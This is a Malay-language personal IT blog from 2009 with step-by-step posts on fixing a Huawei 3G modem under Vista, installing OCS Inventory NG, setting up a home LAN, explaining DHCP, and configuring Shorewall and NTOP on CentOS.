Upgrade HUAWEI 3G Modem E220 and solve problem detection on vista

2009-10-13T21:59:00.006+08:00

Aku nak luahkan apa yang aku jumpe kat internet dari surfing aku dan 5 hari notebook vista aku tak detect 3G Modem HUAWEI ofis punye ni.

Sebelum jadi gini ok je modem tu detect kat notebook MS Vista aku ni tapi selepas aku terbaca step untuk upgrade firmware modem tu. Step ni sesuai bagi yang guna modem HUAWEI E220 tapi versi firmware lama.

Punca kepada aku teringin nak godek firmware modem tu sebab aku terasa slow teramat sangat akhir2 ni dengan 3g celcom di IM ni. So ada artikel kata perlu upgrade firmware dan software VMCLite tu. So cari punye cari jumpelah.

So lepas aku check firmware modem aku ni kiranya macam dah up to date. Cara nak check buka VMC program tu dan klik Help > Diagnostics. Dalam tu ada summary firmware version dan info lain tentang modem tu. Selain tu aku tengok software aku guna ni versi lama. Ada versi baru, jadi aku pun ikut step di bawah ni dan secara tak sengaja terupdate firmware yang dah latest. Tapi resultnya takde masalah pun sebab ia akan detect firmware dah up to date. Berikut stepnya :

1) Cari PC/Notebook Windows 2000 / XP dan plug modem padanya. Sebelum tu uninstall dulu Software Vodafone yang ada dalam PC tu
2) Plug semula modem tu pada pc tu tadi. EULA akan pop up keluar dan pilih cancel.
3) Untuk update bagi tujuan masalah Vista tak detect modem tu. Download file berikut dan run.
4) Sikit lagi nak siap ni. Sekarang update software device modem tu ke versi terkini. Ada fungsi SMS di perbetulkan dalam versi baru ni. Download file berikut dan run. Jika ada error 'firmware not response' biarkan sebab ianya tiada masalah.

Setelah selesai maka modem anda dah ada software terkini dan firmware terkini.
Barulah boleh plug in pada vista. Pasti akan detect dan boleh digunakan.

Bagi kes aku ni, aku cuma upgrade device software tu je. So caranye :

1) uninstall Vodafone software dari pc vista
2) aku run registry booster untuk cleanup registry software lama tu.
3) restart pc vista aku
4) aku plug in pada pc vista aku dan ia akan detect untuk install semula software dan driver berkenaan.
5) Tapi PC aku ni problem dengan install HUAWEI Mass Storage USB Device, ia stuck kat situ.
6) Buka Device Manager (Control Panel)
7) Tengok pada USB Mass Storage Device ada tanda seruan kuning dan "Universal Serial Bus controllers". Klik kanan dan pilih "Update Driver Software"
8) Pilih "Browse my computer"
9) Pilih "Let me pick"
10) uncheck "sHOW COMPATIBLE DEVICES"
11) Pilih "(Generic USB Host Controller)" dan seterusnya pilih "USB Composite Device" pada model tab. Install sampai siap.
12) Anda akan tengok selepas siap install tu drivers lain pun menyusul, Data Interfaces kantoi juga tapi lepas unplug modem dan plug in semula ia auto install.

So selepas tu terusla aku leh guna modem tu semula.
Fuhhh lega...aku ingatkan symantec aku ni blok software tu dari running tapi memang aku ada set polisi cuma test mode je dan aku semak log memang betul pun.

So masalah vista ni memang menyakitkan kepala dan aku harap cepat2 la keluar windows 7 yan aku dengar banyak memuji dari mengeji macam vista ni.

Sorry Bill Gates

Selamat mencuba bagi yang ada masalah macam aku ni.

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Asset Inventory Using Open Source PART III

2009-10-04T23:20:00.004+08:00

Cepatnye pulak aku update yek..

Ok aku akan terangkan bagaimana nak dapatkan inventori dari pc standalone dan masukkan dalam server OCS Inventory.

1) Extract file OCS Inventory Agent ke c:/ocsng/
2) Run command line
3) taip cd c:/ocsng/
4) Taip OcsAgent.exe /local
5) Paparan berikut akan keluar dan pilih tempat untuk disimpan fail yang akan digenerate untuk inventory report pc tersebut.

6) Sekiranya keluar dialog box minta info tag, sila masukkan tag berkenaan atau boleh kemaskini dari web OCS NG Inventory. Jika tidak, akan keluar mesej mengatakan telah berjaya export info PC ke file path yang kita tetapkan.

7) Setelah selesai export fail tersebut, import pula ke dalam server OCS NG Inventory melalui web. (user admin sahaja boleh akses)

8) Sekiranya ingin rerun inventory pc tersebut semula, sila taip berikut pada command prompt :

>cd c:/ocsng

>Ocsinventory.exe /local

Sekarang anda dah berjaya menyimpan inventory pc standalone ke dalam server OCS NG Inventory.

Bagi yang ingin mencuba, moga berjaya !!!

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Asset Inventory Using Open Source PART II

2009-10-04T20:45:00.010+08:00

Fuhh lamannya aku rasa tak menulis blog untuk blog ICT aku ni. Terasa mengabaikannya pulak.. So hari ni aku bersemangat nak update dan selesaikan part 2 dari artikel sebelum ni..

Untuk makluman semua, aku dah berjaya buat instalasi software ni pada server yang menggunakan Red Hat Enterprise Linux 5 untuk tujuan dapatkan senarai inventori PC di dalam rangkaian PahangNet. Ianya akan digunakan sebagai bukti dan lampiran kepada Proses Audit aku nanti.

Aku akan terangkan cara-cara untuk install OCS Inventory Server dan OCS Inventory Client Agent.

System : RHEL 5, Centos 5.2
OCS Inventory Server : Muat turun disini

1) Instalasi OCS Inventory Server dependencies

#cd /usr/local/src/
#wget http://apt.sw.be/redhat/el5/en/i386/RPMS.dag/rpmforge-release-0.3.6-1.el5.rf.i386.rpm
#rpm --import http://dag.wieers.com/rpm/packages/RPM-GPG-KEY.dag.txt
#rpm -Uvh rpmforge-release-0.3.6-1.el5.rf.i386.rpm

2) Instalasi MySQL dan Apache pada server

# yum install mysql-server mysql httpd
# vim /etc/httpd/conf/httpd.conf
# echo "ServerName your_server_name:80" >> /etc/httpd/conf/httpd.conf
# service httpd start; chkconfig httpd on
# service mysqld start; chkconfig mysql on

Konfigurasi MySQL database root password :

# mysql -u root mysql
mysql> UPDATE user SET password=PASSWORD('desired_password')
->WHERE User='root';
mysql>;DELETE FROM user WHERE user = '';
>;FLUSH PRIVILEGES;
mysql>DROP DATABASE test;
mysql>exit

* Create database OCS
#mysql -u root -p
mysql>CREATE DATABASE ocsweb;
mysql>GRANT ALL PRIVILEGES ON ocsweb.* TO ocs@localhost IDENTIFIED BY 'ocs';
mysql>exit

3) Instalasi Perl dan PHP

#yum -y install perl-XML-Simple perl-Compress-Zlib perl-DBI perl-DBD-MySQL perl-Apache-DBI perl-Net-IP perl-SOAP-Lite
#yum -y install php-pecl-zip php-mysql php-devel zlib-devel php-pear php-gd gcc
#yum -y install php-snmp php-posix libgd2 gd-devel libpng libpng-devel perl-config-IniFiles perl-Crypt-DES perl-Digest-HMAC perl-Digest-SHA1 perl-GD perl-IO-Socket-INET6 perl-Net-SNMP perl-rrdtool perl-Socket6 mod_perl
#yum -y install sudo make gcc

4) Instalasi zip support

#pecl install zip
# vim /etc/php.ini
#echo ";Add zip support" >> /etc/php.ini
#echo "extension=zip.so" >> /etc/php.ini

# service httpd restart

5) Instalasi OCS Script

#cd /usr/local/src
#wget http://nchc.dl.sourceforge.net/sourceforge/ocsinventor/OCSNG_LINUX_SERVER_1.01.tar.gz
#tar zxvf OCSNG_LINUX_SERVER_1.01.tar.gz
#cp -rf OCSNG_LINUX_SERVER_1.01 /var/www/html/OCSNG
#cd /var/www/html/OCSNG/ocsreports
#touch dbconfig.inc.php
#chmod 666 dbconfig.inc.php
#cd /var/www/html/OCSNG
#./setup.sh

OCS telah diinstall di /var/www/html dan direktori web server adalah /etc/httpd/conf.d/ocsinventory.conf dan logging directory /var/log/ocsinventory-NG/

#service httpd restart

6) Konfigurasi OCS Web

Taip URL berikut :
http://your_server_ip/OCSNG/ocsreports/install.php

Anda akan dapat lihat login MySQL box dan penuhkan maklumat tersebut :
MySQL login: root
MySQL Password: whatever you change it too
MySQL HostName: localhost

6) Instalasi OCS Agent/Client pada server RHEL yang sama

# yum install perl-XML-Simple perl-Compress-Zlib perl-Net-IP perl-Net-SSLeay

Sekiranya tak jumpa, cari kat RPMforge archive

Download OCS Agent

# tar -xzvf OCSNG_LINUX_AGENT_1.01_with_require.tar.gz
# cd OCSNG_LINUX_AGENT_1.01
# sh setup.sh

Taipkan ip address server OCS dan pilih port 80.

7) Instalasi OCS Agent/Client pada Windows

Dapatkan perisian di sini.

Extract dan klik pada file OCSAgent Setup :

Server address : ip / domain server OCS NG Inventory

Setelah selesai, inventori PC Windows akan dapat dilihat dalam senarai di server.

Ok, untuk instalasi OCS Inventory Server dah selesai, instalasi OCS Agent pada Client Linux dan Windows juga selesai.

Namun semuanya tu bagi mendapatkan info inventori perlukan ada sambungan rangkaian diantara server dan client.

Namun bagi PC yang standalone pula macamana?...OCS NG Inventory ada penyelesaiannya juga tapi akan aku terangkan dalam artikel seterusnya Part III.

Selain tu, bagi company yang belum ada sistem maklumat asset di tempat masing-masing, maka OCS Inventory ni mampu diintegrasikan dengan software GLPI (Asset Management Software)

Bagi tempat aku dah ada Sistem Pengurusan Aset (SPA) maka aku tak guna dah GLPI ni. Kalau belum ada pasti aku guna dah ni.

Instal dulu GLPI pada server yang sama dengan OCS NG Inventory Server.
Setelah GLPI dibuat instalasi, login dan browse skrin berikut :
General -> Restrictions

Anda perlu aktifkan OCSNG sebelum boleh digunakan fungsi integrasi tersebut. Ubah konfigurasi tersebut dan simpan.

Selepas itu, pergi ke menu berikut :
Setup -> OCSNG

Dari GLPI kita boleh import data dari OCS Inventory Server.
Kemudian pergi ke menu :
Tools -> OCSNG

Sekiranya dah gunakan GLPI ni sekian lama maka lagi cantik la ada tambahan dari OCS Inventory yang akan dapatkan datan inventori secara berkala dari PC client.

---------------------------------------------------
Wah...seronoknya dengan Open Source...

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Asset Inventory Using Open Source PART I

2009-07-25T07:51:00.004+08:00

Kali ni aku akan ceritakan tentang satu software dipanggil OCS Inventory NG. Ini adalah perisian terbaik open source Asset Inventory setakat ni yang aku search. Sebenarnya aku saje cari-cari kat internet kot-kot ada software yang boleh search asset inventory semua PC dalam network kat Pejabat aku.

Aku tahu dan pernah guna software LANDesk. OK dari segi implementation dan strategi untuk collect information tapi mengslowkan PC yang amat sangat. Aku tahu juga di bawah Symantec pun ada software tentang perkara ni. Tapi semua ni perlu ada fulus nak guna dan perlu sentiasa renew lesen tiap tahun selain kalau nak tambah user lagi perlu beli lesen lagi...aiyakk...aku kena hindarkan dalam zaman-zaman sekarang ni. Perlu ada penjimatan..

So aku nampak solution terbaik ialah menggunakan OCSInventory NG. Software ni berfungsi untuk :
- Collect Inventori PC
- Deploy Software installation through server kepada PC
- Support Multiple OS (Microsoft Windows, Linux, *BSD, Sun Solaris, IBM AIX, HP-UX, MacOS X)
- Gunakan Web Admin Console
- Perlukan PHP, MySQL, Apache dan Perl untuk server setup

Ok seterusnya cara-cara nak install tu aku akan terangkan dalam artikel aku nanti. Aku dah berjaya setup server on Red Hat EL 5 dan collect inventory on Linux dan Windows XP SP3. So layarilah web ni dulu untuk fahami software ni : http://www.ocsinventory-ng.org/

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Create New MySurfGuard in 15 minutes

2009-07-04T00:16:00.006+08:00

Bebaru ni aku ada setup server mysurfguard (squid+dansguardian) baru gunakan version baru dari OSCC dan dimasukkan sekali dalam tu :

1) VSFTP untuk ftp server simpanan installer teknikal di daerah
2) Shorewall untuk kawal hanya subnet di daerah berkenaan sahaja boleh guna server tu sebagai proxy server dan juga untuk filter port yang melalui server tersebut
3) NTOP untuk monitor bandwidth utilization.

So aku dah sesiap install dan configure cun punye satu server ni. Spesifikasi dan harddisk sama dengan yang digunakan disemua daerah. So aku clonekan menggunakan clonezilla. Lebih kurang caranya seperti artikel aku berikut : Clonezilla

So dah siap create image 80GB tu ke dalam image file dalam 1Gb lebih rasanya. Aku simpan dalam thumb drive aku. So mulai sekarang aku boleh setup mysurfguard baru pada server di daerah (PC Pentium 4) kepada versi baru dengan 15 minit sahaja...ehehehe...

Aku try tadi ada la dalam jangkamasa tu sebab nak restore image untuk clone ke server daerah tu ambil masa 8 minit, so 7 minit lagi untuk aku setup ip filter dalam shorewall dan juga semakan servis berfungsi serta pastikan senarai exceptionsitelist dan bansitelist dikemaskini yang terkini. Selain tu juga aku upgrade RAM server tu jadi 1.5GB...ehehehe..kasik besau sikit sebab banyak fungsinya tu.

Jadi setakat ni aku buat secara berperingkat dan setakat ni 5 server mysurfguard daerah telah di clone versi baru dan di upgrade RAM. Tinggal lagi 6 server going to upgrade soon. Expected by middle of this month semuanya akan siap di upgrade..

Kena pastikan SKT aku tahun ni tercapai ni.

Seronok bila kita mampu memudahkan kerja sendiri dengan kaedah yang kita cipta sendiri...fikirkan tahap kepuasannya amatlah tinggi...

So, aku dah explain pada staff teknikal pejabat aku agar guna cara ni tapi tulah..kepala masing-masing masih belum rasa kepuasan tersebut sendiri dan masih mengamalkan budaya menunggu 'someone' untuk melakukannya untuk mereka tanpa mahu usaha sendiri...jadi akibatnya kerja mereka juga akan di outsource nanti...berhatilah...masa tu makin dekat...

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Step to Setup Small LAN at Home

2009-06-27T15:00:00.005+08:00

Pada masa kini keperluan komputer telah menjadi keperluan kepada isi rumah kita
dan sumber pengetahuan terbesar adalah menerusi internet. Namun pengetahuan yangdiperolehi perlulah dikawal dan ditapis agar ianya tidak akan menjadi anai-anai
kepada pemikiran anak-anak muda sekarang

Target kita sekarang untuk mewujudkan LAN di rumah denag capaian ke internet dengan membolehkan digunakan oleh Personal Komputer secara capaian kabel dan juga Notebook secara capaian wireless.

Cara untuk setup Small LAN di rumah ni memerlukan beberapa peralatan berikut :

1) Talian telefon berdaftar Streamyx
2) Modem router - dial kepada talian streamyx dan menghantar data dari LAN ke internet
3) Switch - Bagi tujuan sambungan komputer atau peralatan rangkaian yang banyak
4) Access Point - Alat untuk membolehkan sambungan secara wireless oleh Notebook
5) 3 Unit Kabel UTP RJ45 - untuk sambungan modem ke switch, switch ke PC dan switch ke Access Point
6) 1 unit kabel RJ11 -Kabel telefon untuk sambungan ke modem

Kita setup peralatan tersebut seperti gambarajah di bawah :

Kabel UTP tersebut perlulah dari jenis CAT 5e atau CAT 6. Bezanya Cat5e ni sesuai untuk IPV4 dan juga boleh digunakan untuk IPV6. Namun Cat6 ni mampu untuk menghantar data yang lebih besar seperti multimedia dan video conference. Kabel CAT5e ni lembut sikit tapi CAT6 lebih keras. CAT 5e boleh disambung sehingga 100m sahaja. Tapi CAT6 boleh dari tu lagi.

Untuk wujudkan DHCP tadi boleh follow artikel saya sebelum ni tentang DHCP Concept in Network.

Pada modem tetapkan ip modem dan gateway kepada 192.168.1.1. Setupkan DHCP enable di modem tersebut.

PC akan mendapat ip dalam range 192.168.1.2 - 192.168.1.99. Subnet Mask 255.255.255.0 dan gateway 192.168.1.1 serta DNS streamyx 202.188.0.133 dan 202.188.1.5 secara automatik.

Bagi sambungan rangkaian Wireless ni kita memerlukan untuk membuat konfigurasi pada Access Point (AP) tersebut. Tetapkan IP pada AP tersebut kepada 192.168.1.100.

Enablekan juga DHCP pada wireless kepada range 192.168.1.101 - 192.168.1.130

Notebook akan mendapat ip range ditetapkan tadi bersama Subnet Mask 255.255.255.0 dan gateway 192.168.1.1 serta DNS streamyx 202.188.0.133 dan 202.188.1.5 secara automatik.

Selain tu kita kena configure AP tersebut agar lebih secure agar jiran atau orang lain di luar tidak dapat menggunakan internet kita dengan percumanya..ehehhe...

Tetapkan key WEP, WPA atau WPA2 pada AP tersebut. key ni biasanya amat panjang dan susah untuk diingat. Disamping tu masukkan MAC Address Wireless Card notebook tu juga ke dalam senarai MAC Filtering. So kat sini kita ada 2 mangga kawalan untuk orang masuk ke network internet kita menerusi wireless.

Cara untuk dapatkan MAC Address tersebut adalah dengan menaip pada command :

> ipconfig /all

[Windows XP]

Atau boleh double klik ikon wireless dan lihat detail. Ambil no pada physical address. Jangan risau setiap notebook ada physical address berbeza. Kecuali hackers ni guna spoof MAC Address tu lain citer.

So selesai setup AP tu jangan lupa save.

Kita tak boleh ambil mudah yagn setting tu dah cukup kuat sebab bagi hackers yang expert ianya semua boleh dipecahkan...ehheee..so guna wireless network ni memang kena berhati-hati.

Itu sahaja yang dapat aku citer untuk cara nak setup network mudah di rumah. Semoga anda semua berjaya.

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Change KDE to GNOME in CentOS

2009-06-27T14:16:00.000+08:00

KDE dan GNOME ni kira theme default untuk linux distro. Tapi akhir-akhir ni
banyak orang komplen pasal theme KDE yang ada masalah dan selalu hang. Pada
memula dulu memang orang guna GNOME sahaja tapi sebabkan nak kasik tune cantik sikit maka KDE timbul take over. Dan kini kebanyakan user lebih prefer GNOME sebab dah enhance features selain lebih laju.
Yumex juga dipanggil sebagai Yum-Extender

Kaedah ni aku dah cuba untuk server CentOS dan Fedora Core

1. Download dan install Yumex untuk install pakej GNOME
2. Delete KDE sahaja. Kekalkan pakej KDE lain yang tak berkenaan.
3. reboot server dan anda akan dapat lihat perubahan tersebut di login dan pada desktop
4. Ubah pilihan GNOME sebagai default login.
5. Adjust login selection agar KDE sebagai default.

Yumex tu juga boleh digunakan untuk memudahkan uninstall dan install pakej pada Linux.

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

DHCP Concept in Network

2009-06-27T10:28:00.000+08:00

Kali ni aku nak terangkan tentang konsep DHCP yang kita sedar atau tak
sedar telah dilaksanakan di dalam rangkaian yang sedang kita gunakan.

DHCP pada WAN

Untuk talian Streamyx atau 3G, sebenarnya kita telahpun gunakan konsep DHCP ni. Cuma ianya berlaku di peringkat Wide Area Netowrk (WAN). Tanpa kita sedari sebenarnya pada modem kita tu apabila kita dial manual atau auto dial ianya akan diberikan IP DHCP dari DHCP server di Streamyx. Begitu juga untuk penggunaan 3G.

Cuma aku perasan bila gunakan 3G Celcom ni aku akan dapat ip 10.xxx.xxx.xxx untuk ip WAN. Manakala IP Streamyx pula kita akan dapat ip bermacam tapi bukan bermula dengan 10.xxx.xxx.xxx tapi kekadang 58.xxx.xxx.xxx atau 208.xxx.xxx.xxx. Bergantung kepada range ip yang dibeli oleh Streamyx.

DHCP pada LAN

Bagi melaksanakan DHCP pada LAN kita memerlukan DHCP server. Untuk network kecil seperti menggunakan streamyx kebiasannya pada modem tu ada fungsi sebagai DHCP server. Selain tu jika tak setting pada modem, kianya juga boleh di setting di router (alat selepas modem). Router ini selain berfungsi untuk menghantar packet kepada rangkaian yang diinginkan ianya juga boleh berfungsi sebagai DHCP server. Ok aku tanak citer panjang pasal router sebab nak citer tentang tu banyak lagi leh aku citerkan.

So untuk setup dedicated DHCP server di LAN ni bagi pelaksanaan 1 subnet (VLAN) sahaja kita memerlukan peralatan server dan perisian DHCP Server. Bagi pengguna DHCP Server Windows kebiasaannya ianya dah ada dalam tu terus. So bila beli lesen windows server 2000 atau 2003 tu akan ada sekali fungsi DHCP Server. Cuma ianya by default tidak di enablekan. Kita perlu setup dan enablekannya. Cara-cara tu aku tak terangkan disini.

Manakala bagi solution lain pula boleh gunakan teknologi open source Linux OS Server. Dalam CentOS, Fedora, FreeBSD dan selainnya distro linux semua ada fungsi tu dan yang bestnya ianya semua percuma. Kalau nak setup tu aku masa memula setup OS tu terus pilih untuk jadikan server tu sebagai DHCP Server. Memang dah ada dalam bahagian pilihan applicaion disediakan dalam tu.

Apabila DHCP Server dah diwujudkan maka kita perlu setting IP di PC dalam LAN tu agar menggunakan Obtain IP Automatically seperti gambar di bawah ;

Network Properties > IP Protocol Properties

Sekarang anda dah pun ada LAN menggunakan DHCP.

Bagi pelaksanaan DHCP server multiple VLAN ni boleh dibuat cuma agak rumit sikit sebab melibatkan konfigurasi di switch layer 3 dan seterusnya di DHCP Server tu sendiri agar boleh route VLAN berkaitan ke destinasi sepatutnya. Jadi bab ni aku tak penah buat lagi. Mungkian akan difikirkan pada masa akan datang dan aku akan sharekan jangan risau.

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

8 Steps to Setup Shorewall in CentOS 5.2

2009-06-26T10:40:00.007+08:00

Shoreline Firewall atau Shorewall adalah perisian yang mampu untuk mengawal laluan keluar masuk packet melalui rangkaian. Fungsinya adalah sama seperti iptables cuma versi yang ditambahbaik dan segi fungsinya.Kali ni aku akan setup shorewall untuk server mysurfguard (mysg) aku.

STEP 1
Download shorewall (Kalau boleh cuba cari versi terkini)

#wget http://www.invoca.ch/pub/packages/shorewall/4.0/shorewall-4.0.11/shorewall-
4.0.11-2.noarch.rpm
#wget http://www.invoca.ch/pub/packages/shorewall/4.0/shorewall-4.0.11/shorewall-
perl-4.0.11-2.noarch.rpm
#wget http://www.invoca.ch/pub/packages/shorewall/4.0/shorewall-4.0.11/shorewall-
shell-4.0.11-2.noarch.rpm

Anda boleh download dari website shorewall untuk versi terkini.
http://www.shorewall.net/download.htm

STEP 2

Install Shorewall

#rpm -ivh shorewall-perl-4.0.11-2.noarch.rpm shorewall-shell-4.0.11-2.noarch.rpm shorewall-4.0.11-2.noarch.rpm

STEP 3

Setting Shorewall

Program shorewall tu takkan berfungsi selagi shorewall configuration file belum dikemaskini.

# nano /etc/shorewall/shorewall.conf

Tukar line pertama
STARTUP_ENABLED=No
hingga
STARTUP_ENABLED=Yes

Save and exit (in NANO, type Ctrl+X dan taip Y).

Sekiranya anda nak salin dari sampel tengok di /usr/share/doc/shorewall-4.0.11/Samples/. Dalam sampel ni ada 3 folder iaitu : one-interface/,two-interfaces/ and three-interfaces/.

Bergantung kepada situasi network di tempat anda. Situasi aku ni just nk setup pada mysg aku yang pakai 1 network sahaja dan tak berfungsi sebagai transparent, jika nak guna sampel ikut cara ni :

#cp /usr/share/doc/shorewall-4.0.11/Samples/one-interfaces
/{interfaces,policy,masq,routestopped,rules,zones} /etc/shorewall/

atau

#cp /usr/share/doc/shorewall-4.0.11/Samples/two-interfaces
/{interfaces,policy,masq,routestopped,rules,zones} /etc/shorewall/

atau

#cp /usr/share/doc/shorewall-4.0.11/Samples/three-interfaces
/{interfaces,policy,masq,routestopped,rules,zones} /etc/shorewall/

Sekarang anda dah ada configuration file di /etc/shorewall.

STEP 4

Zones Configuration

Buka dan edit file /etc/shorewall/zones untuk kenal[asti network zone. Ini hanya penglabelan aje.

# nano /etc/shorewall/zones

Kita setup 3 zone Internet(NET), Private Zon (DMZ) dan Zon firewall (FW):

#ZONE TYPE OPTIONS IN OPTIONS OUT OPTIONS
#
fw firewall
net ipv4
loc ipv4
dmz ipv4
#LAST LINE - ADD YOUR ENTRIES ABOVE THIS ONE - DO NOT REMOVE

STEP 5

Interfaces Configuration

Kemudian edit network interface firewall anda.

# nano /etc/shorewall/interfaces

Berikut adalah contoh configuration. Bagi penggunaan aku cuma ada satu network interface aje jadi hanya line pertama je aku guna :

#ZONE INTERFACE BROADCAST OPTIONS
net eth0 detect tcpflags,dhcp,routefilter,nosmurfs,logmartians
loc eth1 detect tcpflags,nosmurfs
dmz eth2 detect
#LAST LINE -- ADD YOUR ENTRIES BEFORE THIS ONE -- DO NOT REMOVE

STEP 6

Policy Configuration

Ok, part ni agak penting untuk pastikan flow data akan di alirkan berdasarkan zon yang kita dah define tadi. Polisi yang digunakan adalah REJECT atau DROP dan tentukan port apa yang akan allow seterusnya.

# nano /etc/shorewall/policy

Contoh polisi berdasarkan 3 zon tadi :

#SOURCE DEST POLICY LOG LEVEL LIMIT:BURST
#
# Policies for traffic originating from the local LAN (loc)
#
# If you want to force clients to access the Internet via a proxy server
# in your DMZ, change the following policy to REJECT info.
loc net ACCEPT
# If you want open access to DMZ from loc, change the following policy
# to ACCEPT. (If you chose not to do this, you will need to add a rule
# for each service in the rules file.)
loc dmz REJECT info
loc $FW REJECT info
loc all REJECT info
#
# Policies for traffic originating from the firewall ($FW)
#
# If you want open access to the Internet from your firewall, change the
# $FW to net policy to ACCEPT and remove the 'info' LOG LEVEL.
$FW net REJECT info
$FW dmz REJECT info
$FW loc REJECT info
$FW all REJECT info
#
# Policies for traffic originating from the De-Militarized Zone (dmz)
#
# If you want open access from DMZ to the Internet change the following
# policy to ACCEPT. This may be useful if you run a proxy server in
# your DMZ.
dmz net REJECT info
dmz $FW REJECT info
dmz loc REJECT info
dmz all REJECT info
#
# Policies for traffic originating from the Internet zone (net)
#
net dmz DROP info
net $FW DROP info
net loc DROP info
net all DROP info
# THE FOLLOWING POLICY MUST BE LAST
all all REJECT info
#LAST LINE -- ADD YOUR ENTRIES ABOVE THIS LINE -- DO NOT REMOVE

STEP 7

Rules Configuration

Ni adalah configuration paling penting untuk kita tentukan subnet mana yang akan allow melalui firewall ini berdasarkan port yang dibenarkan dan port yang dihalang. Jika tiada setting dibuat maka ia akan merujuk kepada default polisi tadi.

Nota: Ni hanya untuk new connection, connection sedia ada akan automatik dikenalpasti.

# nano /etc/shorewall/rules

Contohnya seperti di bawah :

#############################################################################################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK
# PORT PORT(S) DEST LIMIT GROUP
#
# Accept DNS connections from the firewall to the Internet
#
DNS/ACCEPT $FW net
#
#
# Accept SSH connections from the local network to the firewall and DMZ
#
SSH/ACCEPT loc $FW
SSH/ACCEPT loc dmz
#
# DMZ DNS access to the Internet
#
DNS/ACCEPT dmz net
#
# Drop Ping from the "bad" net zone.
#
Ping/DROP net $FW
#
# Make ping work bi-directionally between the dmz, net, Firewall and local zone
# (assumes that the loc-> net policy is ACCEPT).
#
Ping/ACCEPT loc $FW
Ping/ACCEPT dmz $FW
Ping/ACCEPT loc dmz
Ping/ACCEPT dmz loc
Ping/ACCEPT dmz net
ACCEPT $FW net icmp
ACCEPT $FW loc icmp
ACCEPT $FW dmz icmp
# Uncomment this if using Proxy ARP and static NAT and you want to allow ping from
# the net zone to the dmz and loc
#Ping/ACCEPT net dmz
#Ping/ACCEPT net loc
#LAST LINE -- ADD YOUR ENTRIES BEFORE THIS ONE -- DO NOT REMOVE

STEP 8

Finally

Untuk mulakan ujian run command ni :
# service shorewall start

Tapi semua ni kalau nak mudah boleh gunakan module yang ada dalam webmin. Terutama bagi step 7 tadi tu boleh gunakan webmin.

Cuma jika nak restart atau stop shorewall seeloknya gunakan command line sebab lebih stabil.
Skang ni aku boleh tetapkan rule untuk allow dari subnet mana-mana sahaja boleh gunakan mysg aku.

Sebab aku laksana mysg mengikut daerah jadi aku tanak daerah lain gunakan mysg tu. Selain tu aku boleh control port apa sahaja yang boleh melalui mysg aku.

Terima kasih pada nota dari howtoforge.

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

10 steps to setup NTOP on Centos 5.2

2009-06-26T10:28:00.006+08:00

Ntop ialah alat untuk menganalisa trafik dan rangkaian. Ianya menyediakan segala maklumat berkaitan pelbagai host dan protokol. Yang bestnya ianya boleh dicapai menerusi antaramuka laman web.

Berikut adalah langkah yang telah diuji atas versi 32 bit :
- CentOS Linux 5.2

So aku nak setup NTOP ni pada server mysurfguard (proxy+dansguardian) aku. Ini bertujuan untuk aku memantau trafik yang pengguna lalu menggunakan port 80 dari PC masing-masing. Aku boleh kenalpasti pc yang jadi punca masalah dan cuba mengakses laman web dan p2p yang tak dibenarkan di tempat aku.

Anda boleh guna command berikut :
# cd /opt
# wget http://freshmeat.net/redir/ntop/7279/url_tgz/ntop-3.3.6.tar.gz

Untar tar ball, dan tekan enter :
# tar -zxvf ntop-3.3.6.tar.gzMembuat konfigurasi dan compile ntop pada CentOS

1) Anda perlu ada RRDTool

STEP 1

Login sebagai root :
# yum install cairo-devel libxml2-devel pango-devel pango libpng-devel freetype freetype-devel libart_lgpl-devel

Sampel result :

Loading "rhnplugin" plugin
Loading "security" plugin
rhel-x86_64-server-vt-5 100% |=========================| 1.4 kB 00:00
rhn-tools-rhel-x86_64-ser 100% |=========================| 1.2 kB 00:00
rhel-x86_64-server-5 100% |=========================| 1.4 kB 00:00
Setting up Install Process
Parsing package install arguments
Package libxml2-devel - 2.6.26-2.1.2.1.x86_64 is already installed.
Package libxml2-devel - 2.6.26-2.1.2.1.i386 is already installed.
Package pango - 1.14.9-3.el5.i386 is already installed.
Package pango - 1.14.9-3.el5.x86_64 is already installed.
Package freetype - 2.2.1-20.el5_2.i386 is already installed.
Package freetype - 2.2.1-20.el5_2.x86_64 is already installed.
Resolving Dependencies
--> Running transaction check
---> Package libart_lgpl-devel.x86_64 0:2.3.17-4 set to be updated
---> Package pango-devel.i386 0:1.14.9-3.el5 set to be updated
--> Processing Dependency: libXft-devel for package: pango-devel
--> Processing Dependency: libXrender-devel for package: pango-devel
--> Processing Dependency: libXext-devel for package: pango-devel
--> Processing Dependency: libX11-devel for package: pango-devel
--> Processing Dependency: fontconfig-devel >= 2.0 for package: pango-devel
---> Package pango-devel.x86_64 0:1.14.9-3.el5 set to be updated
---> Package freetype-devel.x86_64 0:2.2.1-20.el5_2 set to be updated
---> Package libpng-devel.i386 2:1.2.10-7.1.el5_0.1 set to be updated
---> Package cairo-devel.x86_64 0:1.2.4-5.el5 set to be updated
---> Package libpng-devel.x86_64 2:1.2.10-7.1.el5_0.1 set to be updated
---> Package cairo-devel.i386 0:1.2.4-5.el5 set to be updated
---> Package libart_lgpl-devel.i386 0:2.3.17-4 set to be updated
--> Processing Dependency: libart_lgpl_2.so.2 for package: libart_lgpl-devel
---> Package freetype-devel.i386 0:2.2.1-20.el5_2 set to be updated
--> Running transaction check
---> Package libXrender-devel.i386 0:0.9.1-3.1 set to be updated
--> Processing Dependency: xorg-x11-proto-devel for package: libXrender-devel
---> Package libXft-devel.i386 0:2.1.10-1.1 set to be updated
---> Package libX11-devel.i386 0:1.0.3-9.el5 set to be updated
--> Processing Dependency: libXdmcp-devel for package: libX11-devel
--> Processing Dependency: libXau-devel for package: libX11-devel
---> Package fontconfig-devel.i386 0:2.4.1-7.el5 set to be updated
---> Package libart_lgpl.i386 0:2.3.17-4 set to be updated
